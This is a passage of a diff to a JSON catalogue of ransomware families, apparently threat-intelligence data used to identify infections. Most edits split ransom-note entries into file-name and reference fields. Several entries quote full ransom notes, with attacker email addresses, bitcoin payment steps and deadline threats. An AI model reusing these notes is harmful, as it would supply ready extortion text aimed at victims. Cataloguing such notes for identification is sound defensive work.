AES-128 ciphers.\nMore information about the RSA and AES can be found here:\nhttp://en.wikipedia.org/wiki/RSA_(cryptosystem)\nhttp://en.wikipedia.org/wiki/Advanced_Encryption_Standard\nIt mеаns thаt yоu will nоt bе аblе tо аccеss thеm аnуmоrе until thеу аrе dесrуptеd with yоur pеrsоnаl dесrуptiоn kеy! Withоut уоur pеrsоnаl kеy аnd sреciаl sоftwаrе dаtа rеcоvеrу is impоssiblе! If yоu will fоllоw оur instruсtiоns, wе guаrаntее thаt yоu cаn dесryрt аll yоur filеs quiсkly аnd sаfеly!\nIf yоu wаnt tо rеstоrе yоur filеs, plеаsе writе us tо thе е-mаils:\nFiles4463@tuta.io\nFiles4463@protonmail.ch\nFiles4463@gmail.com\nIn subjеct linе оf your mеssаgе writе yоur pеrsоnаl ID:\n4292D68970C047D9\nWе rесоmmеnd yоu tо sеnd yоur mеssаgе ОN ЕАСH оf ОUR 3 ЕМАILS, duе tо thе fасt thаt thе mеssаgе mау nоt rеаch thеir intеndеd rеcipiеnt fоr а vаriеtу оf rеаsоns!\nPlеаsе, writе us in Еnglish оr usе prоfеssiоnаl trаnslаtоr!\nIf yоu wаnt tо rеstоrе yоur filеs, yоu hаvе tо pаy fоr dесrуptiоn in Bitсоins. Thе pricе dереnds оn hоw fаst уоu writе tо us.\nYour message will be as confirmation you are ready to pay for decryption key. After the payment you will get the decryption tool with instructions that will decrypt all your files including network folders.\nTо cоnfirm thаt wе cаn dесryрt yоur filеs yоu cаn sеnd us up tо 3 filеs fоr frее dесrурtiоn. Plеаsе nоte thаt filеs fоr frее dесrурtiоn must NОT cоntаin аnу vаluаblе infоrmаtiоn аnd thеir tоtаl sizе must bе lеss thаn 5Mb.\nYоu hаvе tо rеspоnd аs sооn аs pоssiblе tо еnsurе thе rеstоrаtiоn оf yоur filеs, bеcаusе wе wоnt kееp yоur dеcrуptiоn kеys аt оur sеrvеr mоre thаn оne wееk in intеrеst оf оur sеcuritу.\nNоtе thаt аll thе аttеmpts оf dесryptiоn by yоursеlf оr using third pаrty tооls will rеsult оnly in irrеvосаble lоss оf yоur dаtа.\n\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 6 hours, рlеаsе сhеck SРАМ fоldеr!\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 12 hours, рlеаsе trу tо sеnd уоur mеssаgе with аnоthеr еmаil sеrviсе!\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 24 hours (еvеn if уоu hаvе prеviоuslу rесеivеd аnswеr frоm us), рlеаsе trу tо sеnd уоur mеssаgе with аnоthеr еmаil sеrviсе tо еасh оf оur 3 еmаils!\nАnd dоn't fоrgеt tо chеck SPАМ fоldеr!", + "HOW TO RECOVER YOUR FILES INSTRUCTION\nATENTION!!!\nWe are realy sorry to inform you that ALL YOUR FILES WERE ENCRYPTED \nby our automatic software. It became possible because of bad server security.\nATENTION!!!\nPlease don't worry, we can help you to RESTORE your server to original\nstate and decrypt all your files quickly and safely!\n\nINFORMATION!!!\nFiles are not broken!!!\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!\n* Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\n\nHOW TO RECOVER FILES???\nPlease write us to the e-mail (write on English or use professional translator):\nPabFox@protonmail.com \nFoxHelp@cock.li\nFoxHelp@tutanota.com\nYou have to send your message on each of our 3 emails due to the fact that the message may not reach their intended recipient for a variety of reasons!\n\nIn subject line write your personal ID:\n[id]\nWe recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \n* Please note that files must not contain any valuable information and their total size must be less than 5Mb. \n\nOUR ADVICE!!!\nPlease be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\n\nWe will definitely reach an agreement ;) !!!" + ], + "ransomnotes-filenames": [ "[5 numbers]-MATRIX-README.RTF", "!ReadMe_To_Decrypt_Files!.rtf", "#Decrypt_Files_ReadMe#.rtf", + "#KOK8_README#.rtf", + "#FOX_README#.rtf", + "!README_GMAN!.rtf", + "#README_EMAN50#.rtf", + "#NOBAD_README#.rtf", + "!ITLOCK_README!.rtf" + ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-RGHgroHt5cU/WEUWnFBn2hI/AAAAAAAACYA/zwSf7rmfWdo4ESQ8kjwj6mJrfzL2V22mgCLcB/s1600/note-eng.png", "https://www.bleepstatic.com/images/news/ransomware/m/matrix/4-7-2018/1/ransom-note.jpg", "https://www.bleepstatic.com/images/news/ransomware/m/matrix/4-7-2018/1/background.jpg", "https://www.bleepstatic.com/images/news/ransomware/m/matrix/4-7-2018/2/wallpaper.jpg", - "WHAT HAPPENED WITH YOUR FILES?\nYour documents, databases, backups, network folders and other important files are encrypted with RSA-2048 and AES-128 ciphers.\nMore information about the RSA and AES can be found here:\nhttp://en.wikipedia.org/wiki/RSA_(cryptosystem)\nhttp://en.wikipedia.org/wiki/Advanced_Encryption_Standard\nIt mеаns thаt yоu will nоt bе аblе tо аccеss thеm аnуmоrе until thеу аrе dесrуptеd with yоur pеrsоnаl dесrуptiоn kеy! Withоut уоur pеrsоnаl kеy аnd sреciаl sоftwаrе dаtа rеcоvеrу is impоssiblе! If yоu will fоllоw оur instruсtiоns, wе guаrаntее thаt yоu cаn dесryрt аll yоur filеs quiсkly аnd sаfеly!\nIf yоu wаnt tо rеstоrе yоur filеs, plеаsе writе us tо thе е-mаils:\nFiles4463@tuta.io\nFiles4463@protonmail.ch\nFiles4463@gmail.com\nIn subjеct linе оf your mеssаgе writе yоur pеrsоnаl ID:\n4292D68970C047D9\nWе rесоmmеnd yоu tо sеnd yоur mеssаgе ОN ЕАСH оf ОUR 3 ЕМАILS, duе tо thе fасt thаt thе mеssаgе mау nоt rеаch thеir intеndеd rеcipiеnt fоr а vаriеtу оf rеаsоns!\nPlеаsе, writе us in Еnglish оr usе prоfеssiоnаl trаnslаtоr!\nIf yоu wаnt tо rеstоrе yоur filеs, yоu hаvе tо pаy fоr dесrуptiоn in Bitсоins. Thе pricе dереnds оn hоw fаst уоu writе tо us.\nYour message will be as confirmation you are ready to pay for decryption key. After the payment you will get the decryption tool with instructions that will decrypt all your files including network folders.\nTо cоnfirm thаt wе cаn dесryрt yоur filеs yоu cаn sеnd us up tо 3 filеs fоr frее dесrурtiоn. Plеаsе nоte thаt filеs fоr frее dесrурtiоn must NОT cоntаin аnу vаluаblе infоrmаtiоn аnd thеir tоtаl sizе must bе lеss thаn 5Mb.\nYоu hаvе tо rеspоnd аs sооn аs pоssiblе tо еnsurе thе rеstоrаtiоn оf yоur filеs, bеcаusе wе wоnt kееp yоur dеcrуptiоn kеys аt оur sеrvеr mоre thаn оne wееk in intеrеst оf оur sеcuritу.\nNоtе thаt аll thе аttеmpts оf dесryptiоn by yоursеlf оr using third pаrty tооls will rеsult оnly in irrеvосаble lоss оf yоur dаtа.\n\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 6 hours, рlеаsе сhеck SРАМ fоldеr!\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 12 hours, рlеаsе trу tо sеnd уоur mеssаgе with аnоthеr еmаil sеrviсе!\nIf yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаils fоr mоrе then 24 hours (еvеn if уоu hаvе prеviоuslу rесеivеd аnswеr frоm us), рlеаsе trу tо sеnd уоur mеssаgе with аnоthеr еmаil sеrviсе tо еасh оf оur 3 еmаils!\nАnd dоn't fоrgеt tо chеck SPАМ fоldеr!", "https://pbs.twimg.com/media/DZ4VCRpWsAYtckw.jpg", "https://pbs.twimg.com/media/DZ4V8uXWsAI0r1v.jpg", - "#KOK8_README#.rtf", - "#FOX_README#.rtf", - "HOW TO RECOVER YOUR FILES INSTRUCTION\nATENTION!!!\nWe are realy sorry to inform you that ALL YOUR FILES WERE ENCRYPTED \nby our automatic software. It became possible because of bad server security.\nATENTION!!!\nPlease don't worry, we can help you to RESTORE your server to original\nstate and decrypt all your files quickly and safely!\n\nINFORMATION!!!\nFiles are not broken!!!\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!\n* Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\n\nHOW TO RECOVER FILES???\nPlease write us to the e-mail (write on English or use professional translator):\nPabFox@protonmail.com \nFoxHelp@cock.li\nFoxHelp@tutanota.com\nYou have to send your message on each of our 3 emails due to the fact that the message may not reach their intended recipient for a variety of reasons!\n\nIn subject line write your personal ID:\n[id]\nWe recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \n* Please note that files must not contain any valuable information and their total size must be less than 5Mb. \n\nOUR ADVICE!!!\nPlease be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\n\nWe will definitely reach an agreement ;) !!!", - "!README_GMAN!.rtf", - "#README_EMAN50#.rtf", - "https://pbs.twimg.com/media/Do_pn7bX0AYh1F-.jpg", - "#NOBAD_README#.rtf", - "!ITLOCK_README!.rtf" + "https://pbs.twimg.com/media/Do_pn7bX0AYh1F-.jpg" ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-2nd-2016-screenlockers-kangaroo-the-sfmta-and-more/", @@ -3199,7 +3315,7 @@ ".locked" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-anaLWyg_iJI/WFaxDs8KI3I/AAAAAAAACro/yGXh3AV-ZpAKmD4fpQbBkAyYXXnkqgR3ACLcB/s1600/note666_2.png" ], "refs": [ @@ -3219,10 +3335,12 @@ ], "payment-method": "Bitcoin", "price": "0.2", - "ransomnotes": [ - "https://2.bp.blogspot.com/-D-j_9_LZen0/WEPq4G5w5FI/AAAAAAAACXs/GTnckI3CGYQxuDMPXBzpGXDtarPK8yJ5wCLcB/s1600/note_2.PNG", + "ransomnotes-filenames": [ "Important!.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-D-j_9_LZen0/WEPq4G5w5FI/AAAAAAAACXs/GTnckI3CGYQxuDMPXBzpGXDtarPK8yJ5wCLcB/s1600/note_2.PNG" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/11/rip-ransomware.html", "https://twitter.com/BleepinComputer/status/804810315456200704" @@ -3240,10 +3358,12 @@ ".novalid" ], "payment-method": "Bitcoin - Link WebSite", - "ransomnotes": [ - "https://3.bp.blogspot.com/-BK_31ORE0ZY/WD284cEVoLI/AAAAAAAACWA/bU0n3MBMD8Mbgzv9bD6VLJb51Q_kr5AJgCLcB/s1600/note.jpg", + "ransomnotes-filenames": [ "RESTORE_CORUPTED_FILES.HTML" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-BK_31ORE0ZY/WD284cEVoLI/AAAAAAAACWA/bU0n3MBMD8Mbgzv9bD6VLJb51Q_kr5AJgCLcB/s1600/note.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/11/novalid-ransomware.html", "https://www.bleepingcomputer.com/forums/t/634754/locked-in-ransomware-help-support-restore-corupted-fileshtml/", @@ -3275,7 +3395,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-281TI8xvMLo/WDw2Nl72OsI/AAAAAAAACTk/nT_rL0z-Exo93FzoOXnyaFgQ7wPe0r7IgCLcB/s1600/Crypter1.jpg" ], "refs": [ @@ -3291,7 +3411,7 @@ "date": "November 2016", "encryption": "AES", "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-2dC_gQTed4o/WDxRSh_R-MI/AAAAAAAACT4/yWxzCcMqN_8GLjd8dOPf6Mw16mkbfALawCLcB/s1600/lblMain.png" ], "refs": [ @@ -3313,7 +3433,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/--45C2Cr8sXc/WDiWLTvW-ZI/AAAAAAAACSA/JnJNRr8Kti0YqSnfhPQBF2rsFf-au1g9ACLcB/s1600/Cockblocke.gif" ], "refs": [ @@ -3334,7 +3454,7 @@ ], "payment-method": "Bitcoin", "price": "0.68096697 (500$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-nXv88GxxOvQ/WE1gqeD3ViI/AAAAAAAACf4/wcVwQ9Pi_JEP2iWNHoBGmeXKJFsfwmwtwCLcB/s1600/Lomix.png" ], "refs": [ @@ -3356,10 +3476,12 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ - "https://2.bp.blogspot.com/-r-vBnl-wLwo/WDg7fHph9BI/AAAAAAAACRc/VuMxWa1nUPIGHCzhCf2AyL_uc7Z9iB6MACLcB/s1600/note_2.PNG", + "ransomnotes-filenames": [ "HOW TO DECRYPT YOU FILES.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-r-vBnl-wLwo/WDg7fHph9BI/AAAAAAAACRc/VuMxWa1nUPIGHCzhCf2AyL_uc7Z9iB6MACLcB/s1600/note_2.PNG" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/11/ozozalocker-ransomware.html", "https://decrypter.emsisoft.com/ozozalocker", @@ -3378,7 +3500,7 @@ ".mo0n" ], "payment-method": "WebSite link", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-8-8X7Nd1MYs/WDSZN6NIT1I/AAAAAAAACNg/ltc7ppfZZL0vWn8BV3Mk9BVrdmJbcEnpgCLcB/s1600/222.jpg" ], "refs": [ @@ -3402,7 +3524,7 @@ ], "payment-method": "Bitcoin", "price": "0,5 - 1,5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-_i9AjhlvjB8/WDVuLKBnmlI/AAAAAAAACOA/xISXMTBLMbEH4PBS35DQ416woPpkuiVvQCLcB/s1600/note-2.PNG", "https://2.bp.blogspot.com/-4HNc9S8SY4I/WBMkpdKyDsI/AAAAAAAAB0I/udESgro7YB4pF98Dv2KrrecyymFGsvV2QCLcB/s1600/note.JPG" ], @@ -3427,7 +3549,7 @@ ], "payment-method": "Call Number", "price": "349.99$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-61DcGSFljUk/WDM2UpFZ02I/AAAAAAAACMw/smvauQCvG3IPHOtEjPP4ocGKmBhVRBv-wCLcB/s1600/lock-note.png" ], "refs": [ @@ -3450,7 +3572,7 @@ ".ENCRYPTED" ], "payment-method": "no ransom", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-RwJ6R-uvYg0/V-qfeRPz7GI/AAAAAAAABi8/7x4MxRP7Jp8edbTJqz4iuEye0q1u5k3pQCLcB/s1600/donald-trump-ransomware.jpg", "https://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/" ], @@ -3468,7 +3590,7 @@ "date": "November 2016", "encryption": "RSA", "payment-method": "CreditCard", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-qJHhbtoL1Y4/V-lOClxieEI/AAAAAAAABis/IbnVAY8hnmEfU8_iU1CgQ3FWeX4YZOkBACLcB/s1600/Nagini.jpg" ], "refs": [ @@ -3493,7 +3615,7 @@ ], "payment-method": "Bitcoin", "price": "100$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-0N1ZUh4WcxQ/WDCfENY1eyI/AAAAAAAACKE/_RVIxRCwedMrD0Tj9o6-ew8u3pL0Y5w8QCLcB/s1600/lock-note2.jpg" ], "refs": [ @@ -3514,10 +3636,12 @@ ".DALE" ], "payment-method": "Tor WebSite", - "ransomnotes": [ - "https://2.bp.blogspot.com/-OvB9TMJoimE/WC9QXRPFNwI/AAAAAAAACJU/iYcCC9tKvGIu4jH2bd6xLvmO7KMVVCLdgCLcB/s1600/note_2.PNG", + "ransomnotes-filenames": [ "CHIP_FILES.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-OvB9TMJoimE/WC9QXRPFNwI/AAAAAAAACJU/iYcCC9tKvGIu4jH2bd6xLvmO7KMVVCLdgCLcB/s1600/note_2.PNG" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/11/chip-ransomware.html", "http://malware-traffic-analysis.net/2016/11/17/index.html", @@ -3560,16 +3684,20 @@ ], "payment-method": "Bitcoin - Email", "ransomnotes": [ + "all your data has been locked us\nYou want to return?\nwrite email paymentbtc@firemail.cc", + "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\nWrite this ID in the title of your message ACBFF130\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\nhttps://localbitcoins.com/buy_bitcoins\nAlso you can find other places to buy Bitcoins and beginners guide here:\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\nAttention!\nDo not rename encrypted files.\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.", + "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\nWrite this ID in the title of your message BCBEF350\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \nhttps://localbitcoins.com/buy_bitcoins \nAlso you can find other places to buy Bitcoins and beginners guide here: \nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \nAttention!\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam." + ], + "ransomnotes-filenames": [ "README.txt", "README.jpg", "Info.hta", "FILES ENCRYPTED.txt", "INFO.hta", + "all your data has been locked us\nYou want to return?\nwrite email Beamsell@qq.com" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg", - "all your data has been locked us\nYou want to return?\nwrite email paymentbtc@firemail.cc", - "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\nWrite this ID in the title of your message ACBFF130\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\nhttps://localbitcoins.com/buy_bitcoins\nAlso you can find other places to buy Bitcoins and beginners guide here:\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\nAttention!\nDo not rename encrypted files.\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.", - "all your data has been locked us\nYou want to return?\nwrite email Beamsell@qq.com", - "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\nWrite this ID in the title of your message BCBEF350\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \nhttps://localbitcoins.com/buy_bitcoins \nAlso you can find other places to buy Bitcoins and beginners guide here: \nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \nAttention!\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.", "https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg", "https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg", "https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg", @@ -3606,7 +3734,7 @@ ], "payment-method": "Bitcoin", "price": "1200€", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-QaJ-Z27tL7s/WDCvwYY2UVI/AAAAAAAACKg/swpf1eKf1Y8oYIK5U8gbfi1H9AQ3Q3r8QCLcB/s1600/angela-merkel.jpg" ], "refs": [ @@ -3628,10 +3756,12 @@ "payment-method": "Bitcoin", "price": "0.7 - 2.1", "ransomnotes": [ - "https://2.bp.blogspot.com/-skwh_-RY50s/WDK2XLhtt3I/AAAAAAAACL0/CaZ0A_fl2Zk-YZYU9g4QCQZkODpicbXpQCLcB/s1600/note_2.PNG", - "https://4.bp.blogspot.com/-tCYSY5fpE5Q/WDLLZssImkI/AAAAAAAACMg/7TmWPW3k4jQuGIYZN_dCxcSGcY_c4po9wCLcB/s1600/note3_2.PNG", "%AppData%\\@WARNING_FILES_ARE_ENCRYPTED.[victim_id].txt." ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-skwh_-RY50s/WDK2XLhtt3I/AAAAAAAACL0/CaZ0A_fl2Zk-YZYU9g4QCQZkODpicbXpQCLcB/s1600/note_2.PNG", + "https://4.bp.blogspot.com/-tCYSY5fpE5Q/WDLLZssImkI/AAAAAAAACMg/7TmWPW3k4jQuGIYZN_dCxcSGcY_c4po9wCLcB/s1600/note3_2.PNG" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/11/cryptoluck-ransomware.html", "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/", @@ -3665,7 +3795,7 @@ ], "payment-method": "Bitcoin", "price": "0.2 - 2", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-2fAMkigwn4E/WCs1vKiB9UI/AAAAAAAACIs/_kgk8U9wfisV0MTYInIbArwL8zgLyBDIgCLcB/s1600/note-eng.png" ], "refs": [ @@ -3692,11 +3822,13 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ - "https://www.bleepstatic.com/images/news/ransomware/k/karma-ransomware/ransom-note.png", + "ransomnotes-filenames": [ "# DECRYPT MY FILES #.html", "# DECRYPT MY FILES #.txt" ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/k/karma-ransomware/ransom-note.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/11/karma-ransomware.html", "https://www.bleepingcomputer.com/news/security/researcher-finds-the-karma-ransomware-being-distributed-via-pay-per-install-network/", @@ -3716,7 +3848,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-CTLT300bjNk/WCg9mrJArSI/AAAAAAAACGk/weWSqTMVS9AXdxJh_SA06SOH4kh2VGW1gCLcB/s1600/note_2.PNG.png" ], "refs": [ @@ -3736,7 +3868,7 @@ ], "payment-method": "Bitcoin", "price": "0.55 - 0.65", - "ransomnotes": [ + "ransomnotes-filenames": [ "Your files are locked !.txt", "Your files are locked !!.txt", "Your files are locked !!!.txt", @@ -3767,7 +3899,7 @@ ".kolobocheg@aol.com_" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.ransomware.wiki/tag/kolobo/" ], "refs": [ @@ -3792,7 +3924,7 @@ ], "payment-method": "PaySafeCard", "price": "100€", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-r2kaNLjBcEk/WCNCqrpHPZI/AAAAAAAACEE/eFSWuu4mUZoDV5AnduGR4KxHlFM--uIzACLcB/s1600/lock-screen.png" ], "refs": [ @@ -3816,7 +3948,7 @@ ], "payment-method": "Qhvi-wallet / Yandex-wallet", "price": "5000 rubles", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-UFksnOoE4Ss/WCRUNbQuqyI/AAAAAAAACFI/Gs3Gkby335UmiddlYWJDkw8O-BBLt-BlQCLcB/s1600/telegram_rans.gif" ], "refs": [ @@ -3840,7 +3972,7 @@ ], "payment-method": "Bitcoin", "price": "0.4", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-ftA6aPEXwPM/WCDY3IiSq6I/AAAAAAAACCU/lnH25navXDkNccw5eQL9fkztRAeIqDYdQCLcB/s1600/note111.png" ], "refs": [ @@ -3879,7 +4011,7 @@ ], "payment-method": "Bitcoin", "price": "0.33", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_TO_DECRYPT_YOUR_FILES_[random_3_chars].html", "HOW_TO_DECRYPT_YOUR_FILES_[random_3_chars].txt" ], @@ -3923,7 +4055,7 @@ ], "payment-method": "Bitcoin", "price": "0.03", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/11-4-16/CwZubUHW8AAE4qi[1].jpg" ], "refs": [ @@ -3944,7 +4076,7 @@ ".hollycrypt" ], "payment-method": "Bitcoin Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-PdtXGwSTn24/WBxIoomzF4I/AAAAAAAAB-U/lxTwKWc7T9MJhUtcRMh1mn9m_Ftjox9XwCLcB/s1600/note_2.PNG" ], "refs": [ @@ -3963,7 +4095,7 @@ ".BTC" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/--7M0dtKhOio/WBxJx1PflYI/AAAAAAAAB-g/DSdMjLDLnVwwaMBW4H_98SzSJupLYm9WgCLcB/s1600/note_2.PNG" ], "refs": [ @@ -3986,10 +4118,12 @@ ], "payment-method": "Bitcoin", "price": "2", - "ransomnotes": [ - "https://1.bp.blogspot.com/-1jyI1HoqJag/WBzj9SLvipI/AAAAAAAAB_U/_sp8TglWEPQphG8neqrztfUUIjcBbVhDwCLcB/s1600/kangaroo-lock_2.png", + "ransomnotes-filenames": [ "filename.Instructions_Data_Recovery.txt" ], + "ransomnotes-refs": [ + "https://1.bp.blogspot.com/-1jyI1HoqJag/WBzj9SLvipI/AAAAAAAAB_U/_sp8TglWEPQphG8neqrztfUUIjcBbVhDwCLcB/s1600/kangaroo-lock_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/11/kangaroo-ransomware.html", "https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/" @@ -4007,7 +4141,7 @@ ".dCrypt" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-2rS0Yq27wp0/WBtKfupZ2sI/AAAAAAAAB8I/0MR-9Xx0n-0zV_NBSScDCiYTp1KH-edtACLcB/s1600/Lockscreen_2.png" ], "refs": [ @@ -4049,7 +4183,7 @@ ".ace" ], "payment-method": "Website (onion)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-zb0TP0wza7I/WBpShN0tCMI/AAAAAAAAB64/oTkSFwKFVx8hY1rEs5FQU6F7oaBW-LqHwCLcB/s1600/note_2.png" ], "refs": [ @@ -4089,7 +4223,7 @@ ], "payment-method": "Bitcoin", "price": "10 (7300 $)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-0AGEY4vAlA0/WBi_oChzFNI/AAAAAAAAB4w/8PrPRfFU30YFWCwHzqnsx4bYISVNFyesQCLcB/s1600/note.PNG" ], "refs": [ @@ -4115,9 +4249,11 @@ "price": "7 (2000 - 5000 $)", "ransomnotes": [ "Good day Your files were encrypted/locked As evidence can decrypt file 1 to 3 1-30MB The price of the transcripts of all the files on the server: 7 Bitcoin Recommend to solve the problem quickly and not to delay Also give advice on how to protect Your server against threats from the network (Files sql mdf backup decryption strictly after payment)!", - "INFO.txt", "Для связи с нами используйте почту\ninkognitoman@tutamail.com\ninkognitoman@firemail.cc" ], + 